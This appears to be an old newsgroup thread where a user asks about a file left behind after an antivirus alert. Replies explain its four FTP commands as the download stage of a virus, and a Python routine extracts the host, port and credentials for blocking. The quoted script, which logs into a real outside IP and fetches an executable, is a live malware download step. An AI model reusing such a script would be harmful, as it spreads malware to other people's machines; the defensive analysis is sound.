OT: q on virus

When downloading a file, AVG complained, and i told it to "heal" the problem file which i could not find later.

File "i" found after AVG virus notification of infected "wmsoft14674.exe" file; contained:

open 67.150.127.201 3832
user hlthmf hlthmf
get wmsoft14674.exe
quit

***** eof *****

Question: what do those lines mean and do? What if i put 67.150.127.201 in my hosts file, would that help? What does that 3832 mean? Thanks.
--
Robert Baer

I guess that 3832 is a port number.

D from BC British Columbia Canada


Those look like ftp commands. I'm guessing that something hiccuped and, instead of fetching file wmsoft14674.exe, the process wrote these commands into the file intended for download.

I tried running 'open 67.150.127.201 3832' in an ftp session and it timed out. The server is probably down. Scripts like this, with no error trapping, behave strangely when the subsequent commands are run without an open connection.

--
Paul Hovnanian     mailto:Paul@Hovnanian.com
------------------------------------------------------------------
>> Insert witty message here

They appear to be commands which would be fed into a command-line-oriented "FTP" program, to perform an Internet file transfer.

They would open an FTP connection to a specific TCP port (3832) at a specific IP address, "log in" with a nonsense username and password, and retrieve a file called "wmsoft14674.exe" from that system to yours, and then exit the FTP program.

The chances are very high that this is part of the virus's method of spreading itself from one system to another. It's a "two part" virus... a small part which gets into your system somehow (probably by exploiting a security weakness in some program), which then executes these commands via your PC's FTP client software and retrieves the rest of the virus. The "wmsoft14674.exe" file is probably the bulk of the virus, and is executed on your PC to start spreading the virus further.

Nope.

That's a specific TCP port number. The virus running on the infected system (which appears to be part of the "PAC-WEST MANAGED MODEM NAS POOL" according to "whois") is probably "listening" on that port, and responds to connections by downloading the virus.

--
Dave Platt                                    AE6EO
Friends of Jade Warrior home page:  http://www.radagast.org/jade-warrior
  I do _not_ wish to receive unsolicited commercial email, and I will
     boycott any company which has the gall to send me such ads!
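As an added example, not code from any poster in this thread: a small Python scanner that recognises a dropped FTP command script of the shape quoted in the question and pulls out the host, port, credentials and fetched filename as indicators an administrator could block at a firewall or log. The sample script is the one from the thread; the function and class names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the four FTP commands quoted in the question, one per
# line, the way an "ftp -s:script.txt" style script would hold them.
SAMPLE_SCRIPT = """open 67.150.127.201 3832
user hlthmf hlthmf
get wmsoft14674.exe
quit
"""

@dataclass
class FtpDropperIndicators:
    host: Optional[str] = None
    port: int = 21                  # FTP default when 'open' names no port
    user: Optional[str] = None
    password: Optional[str] = None
    fetched: list = field(default_factory=list)

    def looks_like_dropper(self) -> bool:
        # 'open' + 'user' + at least one 'get' is the two-stage fetch shape
        return bool(self.host and self.user and self.fetched)

_OPEN = re.compile(r"^open\s+(\S+)(?:\s+(\d{1,5}))?$", re.I)
_USER = re.compile(r"^user\s+(\S+)(?:\s+(\S+))?$", re.I)
_GET = re.compile(r"^(?:get|mget|recv)\s+(\S+)", re.I)
_KEYWORDS = r"\s+(?=(?:open|user|get|mget|recv|quit|bye)\b)"

def parse_ftp_script(text: str) -> FtpDropperIndicators:
    """Walk an ftp -s: style script and collect the indicators it reveals.
    Also handles the single-line form seen when the line breaks were lost,
    by re-splitting the text in front of each FTP command keyword."""
    ind = FtpDropperIndicators()
    for line in re.split(_KEYWORDS, text.strip(), flags=re.I):
        line = line.strip()
        if m := _OPEN.match(line):
            ind.host = m.group(1)
            if m.group(2):
                ind.port = int(m.group(2))
        elif m := _USER.match(line):
            ind.user, ind.password = m.group(1), m.group(2)
        elif m := _GET.match(line):
            ind.fetched.append(m.group(1))
    return ind

if __name__ == "__main__":
    found = parse_ftp_script(SAMPLE_SCRIPT)
    print(found, "dropper-like:", found.looks_like_dropper())
```

Because the script names a bare IP address rather than a hostname, a hosts-file entry would not affect it; the address and port are what a firewall or proxy rule would have to block.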

Sounds like a frequently used chainloader technique. One of the problems with it is that the actual target file is often many megs in size. Virus or not, it is a damned unpleasant surprise for someone trying to download a program, malevolent or not, with no warning.

--
JosephKK

Yes; unpleasant is a useable term. This was the third time for me and i got curious.

--
Robert Baer
